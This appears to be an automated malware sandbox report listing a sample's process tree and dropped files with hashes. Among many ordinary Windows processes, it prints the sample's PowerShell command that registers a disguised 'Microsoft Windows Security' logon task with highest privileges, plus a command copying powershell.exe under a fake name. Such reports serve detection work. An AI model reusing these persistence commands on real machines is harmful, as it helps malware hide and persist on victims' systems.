                                                                                                                                                                                                                        PID:7124
                                                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:5912
                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:6036
                                                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:3696
                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                              PID:6644
                                                                                                                                                                                                                            • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                              C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:3968
                                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:3480
                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:3508
                                                                                                                                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:3888
                                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:4036
                                                                                                                                                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:4044
                                                                                                                                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:4056
                                                                                                                                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:4288
                                                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:4556
                                                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:4924
                                                                                                                                                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:5008
                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                  PID:1168
                                                                                                                                                                                                                                                • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                                                                                                                                  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                  PID:2088
                                                                                                                                                                                                                                                • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:1588
                                                                                                                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:1360
                                                                                                                                                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:2372
                                                                                                                                                                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                        PID:1448
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 432 -ip 432
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:3248
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 432 -ip 432
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:2532
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4760 -ip 4760
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:1984
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5612 -ip 5612
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:5984
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 6440 -ip 6440
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:6240
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6544 -ip 6544
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:6588
                                                                                                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -pss -s 552 -p 6260 -ip 6260
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:6364
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3536 -ip 3536
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:4616
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6372 -ip 6372
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:5020
                                                                                                                                                                                                                                                                        • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                                                          PID:1532
                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                            cmd /c copy "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\Admin\AppData\Local\Temp\Updater.vbs.exe" /Y
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                            PID:3800
                                                                                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:2888
                                                                                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:2664
                                                                                                                                                                                                                                                                            • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                                                                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:1988
                                                                                                                                                                                                                                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                                                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:2288
                                                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:6192
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:6892
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:6500
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:1960

                                                                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\GoodFrag.exe.log

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          319B

                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                          2a0834560ed3770fc33d7a42f8229722

                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                          c8c85f989e7a216211cf9e4ce90b0cc95354aa53

                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                          8aa2d836004258f1a1195dc4a96215b685aed0c46a261a2860625d424e9402b6

                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                          c5b64d84e57eb8cc387b5feedf7719f1f7ae21f6197169f5f73bc86deddb538b9af3c9952c94c4f69ae956e1656d11ab7441c292d2d850a4d2aaa9ec678f8e82

                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Client.exe.log

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          425B

                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                          de75c43a265d0848584ae05945570edf

                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                          69f95177914f8d8b2f278a91f585a0024b8dffd3

                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                          d9bdf6a2bfdd9b2b5c8593de17ade3d8d317dad331aa6ca0da7483dd06db1140

                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                          365f29c693dd7aa2ade092d765a96f20bf1f7fa93bca7f3b25aeddf5700817b9fd388e8f7d9f1b781c8a876739b06ad16d61e7ed08a1c85ac4be4686a38c63bc

                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\OneDrive.exe.log

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          654B

                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                          2cbbb74b7da1f720b48ed31085cbd5b8

                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                          79caa9a3ea8abe1b9c4326c3633da64a5f724964

                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                          e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3

                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                          ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                          627073ee3ca9676911bee35548eff2b8

                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                          4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                          85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                          3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                          d0c46cad6c0778401e21910bd6b56b70

                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                          7be418951ea96326aca445b8dfe449b2bfa0dca6

                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                          9600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02

                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                          057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949

                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          152B

                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                          d91478312beae099b8ed57e547611ba2

                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                          4b927559aedbde267a6193e3e480fb18e75c43d7

                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                          df43cd7779d9fc91fd0416155d6771bc81565e98be38689cb17caece256bf043

                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                          4086c4ebe410a37d0124fc8bd00c58775e70ab2b7b5a39b4e49b332ce5b4866c6775707436395467aff9596507c96fb4896f3bf0249c5b9c99a927f31dcc1a96

                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          152B

                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                          d7145ec3fa29a4f2df900d1418974538

                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                          1368d579635ba1a53d7af0ed89bf0b001f149f9d

                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                          efc56eb46cf3352bf706c0309d5d740bca6ac06142f9bdc5e8344b81d4d83d59

                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                          5bb663ede88f8b7c96b09c1214aac68eda99bc09525ac383baa96914ff7d553ea1aed09e3c9d16893d791c81ddb164c682dfbb4759ac0bc751221f3e36558a91

                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          27KB

                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                          cacfb74b6db8ec937cadbd7a4e239694

                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                          059f1501f9536c549448169c293d0fa1e3d00031

                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                          3c21c8fd28579bd102c6d48522db328a689c5c8c6048453bb736a1f0d27567cc

                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                          4765d09795339da2afcd22f305b9c595921b6071f8766bfc0285ab6e8e1589a0c262bd86f20caed7258bc2fedfe6e81a1f649dfe25bbaa75569340c8c7ba0c1e

                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          65KB

                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                          b4e11be8051b7f5c65376e20de7eebd0

                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                          6c507313d4fa1c2d182c93168cf94c99d229c069

                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                          694659728781ee694c06d697ec3907b36a72d1cf17d98eb74ce8acd64006d14f

                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                          0e756e415653674a071333ccbd21ef2562418594645a61d2eb597075360652366de96a7dc03294ce7db19d5c7619de1e785d8dd5fdfe2970723dcc56140d4c5d

                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          86KB

                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                          3ada248a7be6c3dd497f9522ef6ad158

                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                          39434a3b3c876af70a94c68bb1f09e5859fa08f9

                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                          b29f09d24dd3ade02a18438c9d6c938a3af27c062006f46b97ba9489c9e5781a

                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                          5f9e0f0b8e2a53218d12d48dc9e8fd5be959f188a2cb1a584e97650df721b24e302f670fb30c79f485d33c27be20325002524bad56b15c4a4f69fc233f02f314

                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000015

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          105KB

                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                          3895c1a1814565c25ccae3708efd237a

                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                          362500bcb85d8aeb94112318a8b741e13856eef6

                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                          f8d7c42bf4a98fe88a3365d1ac902e6a69dc243f81eae4ea053b99a93fe3afc9

                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                          f15babed66027b10be9b244ceaa6508d324c45c6b183f8a6333836445e1d65d19c66a0784f3a2b1eb309e998d28dc41e4fd5f59957973fef092a4f0bb9be5560

                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000018

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          29KB

                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                          f85e85276ba5f87111add53684ec3fcb

                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                          ecaf9aa3c5dd50eca0b83f1fb9effad801336441

                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                          4b0beec41cb9785652a4a3172a4badbdaa200b5e0b17a7bcc81af25afd9b2432

                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                          1915a2d4218ee2dbb73c490b1acac722a35f7864b7d488a791c96a16889cd86eee965174b59498295b3491a9783facce5660d719133e9c5fb3b96df47dde7a53

                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002a

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          19KB

                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                          c32c24bca41a117469bcb21bd92b1c6a

                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                          f6c3af9f0ac300efc397c7f942ae1081b7cf6124

                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                          51d9ffd880ce7e030b9b0301730bbf22248a523ee372bebd95ed24f2c930ea78

                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                          78a270d543eefeee201248eb177f6f9a5b0f11b37c5cbd86a2c1d97864429e76fb73ee1a4090626b71b4b14928f6d389adb4d39062f67d469462a299e787670f

                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000048

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          215KB

                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                          2be38925751dc3580e84c3af3a87f98d

                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                          8a390d24e6588bef5da1d3db713784c11ca58921

                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                          1412046f2516b688d644ff26b6c7ef2275b6c8f132eb809bd32e118208a4ec1b

                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                          1341ffc84f16c1247eb0e9baacd26a70c6b9ee904bc2861e55b092263613c0f09072efd174b3e649a347ef3192ae92d7807cc4f5782f8fd07389703d75c4c4e2

                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                          95a7aa917ec513ac6b71f6f7fc619a2c

                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                          d97437cc76ffa9f6575c76bdffc78903bb341524

                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                          c85fde339224d1c17365645b32d69a5707c72ec1ba1a13fce3a0d800d60e8bd6

                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                          037c805d8ecc29ffd9004e3d002f65d05b63588f46e074a1d978872850cc51f8918b1583a1d8b2faccb00822439c68e7622d740693d9aa6a3d426b82629c1543

                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          768B

                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                          7d97e5a17b86ecc7343bb7cc5249f917

                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                          0b99bfc1ff1587b498fb78d27627de12f19342dd

                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                          9556e7d6f1f502c4ec45e7533bb40d2e09861cd31f4168fcdb718fbdcf085e84

                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                          c8bb9262eea95fb64379f73f80c73800a42cefd5fdf3769c12a59c99a40b3979c763947522205e4940d9433b71ac96636f7d1b27c12415d474b17d350b076ea0

                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\Origins\MANIFEST-000001

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          41B

                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                          5af87dfd673ba2115e2fcf5cfdb727ab

                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                          d5b5bbf396dc291274584ef71f444f420b6056f1

                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                          f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                          de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                          e3898e910ab026a5587d5afd690743c4

                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                          7155ce1896b147715419c272a7f6ddcaae75a9aa

                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                          6e138c4bc1963683ceae7d0f3714734deb88d7a2a9663334ec0f4bf2a77a90d5

                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                          331b5dd63fc6b20f0f099db81f90a9ea4b982eea24ba83d3534f07dc53bb08c8018ea3337bf1d0f2ee94aa15e90959028407924f46d409d99a5fde1d0a618cf0

                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                          ec99b0c8f912cf9c8f7536a9c4936d9b

                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                          a4a14f5b8b2fc4ec89e8c2f88604396ddf6c2641

                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                          6a1d9192421fbbde36ff9bac550f8ece927cdfd2e3cbb15a4d362ed412db2ae9

                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                          416573eaba21b3b4ca91cc14a51cc03a7f48d992d2e9026be32a71d63c3573ffbfab8493137e5a5c1b4031ee0d40011c6d8e09b7e027571b7865878557150234

                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          5KB

                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                          48d0f0fb85384ea63494012360a99e16

                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                          99334862e37f30e8c5ae0426eb11667b03d2fd46

                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                          1ade0906c6895340e91a8a4dc359c508e3157ca55a35e7744608aad322793651
